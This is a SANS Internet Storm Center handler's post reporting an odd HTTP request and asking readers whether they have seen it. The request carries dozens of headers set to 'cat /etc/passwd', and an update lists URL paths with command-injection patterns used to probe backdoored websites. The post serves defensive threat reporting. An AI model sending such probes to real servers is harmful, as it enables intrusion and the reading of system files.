Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC: Strange Http request... - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Strange Http request...
UPDATE:

We received a nice tip about this one from Koivunen Toni, of CERT-FI...
Solution:
---> Looks like it is a scan for backdoored pr0n websites...

bellow is another sample:

http://aaaaaaaaa.com/autorank/control.php
Accept-H33p3r:<<unix-command>>
http://bbbbbbbbb.com/images/nav.php
Accept-H33p3r:<<unix-command>>
http://xxxxxxxxx.com/cgi-bin/archives/00000155_.cgi
Accept-Ip:<<unix-command>>
http://yyyyyyyyy.net/cgi-bin/system.pl
Xa=Xa;g=<<unix-command>>;exit
http://wwwwwwwww.com/cgi-bin/pennywize/penny.cgi
Accept-Ip:<<unix-command>>
http://zzzzzzzzz.com/cgi-bin/tgsw/de/teens/control.cgi
Xa=Xa;g=<<unix-command>>;exit
http://ttttttttt.com/abicons/apache/small/icon.php
Accept-H33p3r:<<unix-command>>

-----------------------------------------------------------
Today we got an interesting email...it was reporting a strange http request:

--------------------------------------------------------------------------------
POST /thumbs/index.php HTTP/1.1
Host: example.com

Connection: keep-alive
Content-Length: 0
Cookie: cat /etc/passwd
Referer: http://example.com/thumbs/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Pragma: no-cache
Cache-Control: no-cache
accept_language: cat /etc/passwd
accept_ip: cat /etc/passwd
ip: cat /etc/passwd
accept_whynot: cat /etc/passwd
accept_phpinfo: cat /etc/passwd
accept_redlight: cat /etc/passwd
accept_ASE: cat /etc/passwd
accept_X: cat /etc/passwd
USER_X87NEK: cat /etc/passwd
ACCEPT_HHT: cat /etc/passwd
Accept_MUZZ: cat /etc/passwd
Accept_MusicIsTheKey: cat /etc/passwd
Accept_encoding: cat /etc/passwd
Accept_MS: cat /etc/passwd
ACCEPT_SHREK: cat /etc/passwd
ACCEPT_s1yntr1o: cat /etc/passwd
ACCEPT_shockfx: cat /etc/passwd
ACCEPT_COOLHK: cat /etc/passwd
ACCEPT_l0ve: cat /etc/passwd
Morgoth: cat /etc/passwd
ACCEPT_ShAd0w: cat /etc/passwd
ACCEPT_bk4712: cat /etc/passwd
Accept_BBBS: cat /etc/passwd
ACCEPT_Resys: cat /etc/passwd
ACCEPT_XPW: cat /etc/passwd
BC: cat /etc/passwd
ZION: cat /etc/passwd
cmd: cat /etc/passwd
ACCEPT_netsploiter: cat /etc/passwd
ACCEPT_jayman: cat /etc/passwd
ACCEPT_Joschi: cat /etc/passwd
ACCEPT_MechW: cat /etc/passwd
ACCEPT_slickrick: cat /etc/passwd
ACCEPT_Banana: cat /etc/passwd
ACCEPT_H33p3r: cat /etc/passwd
ACCEPT_KaIzeR: cat /etc/passwd
ACCEPT_Joschi: cat /etc/passwd
Content-type: application/x-www-form-urlencoded
-----------------------------------------------------------------------

While this is a 'strange' http request, we believe that nothing on the 'cat /etc/passwd' part would be done on the webserver side...
So, our request is to know if have you ever seen this before...
---------------------------------------------------------------
Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)


Pedro

155 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!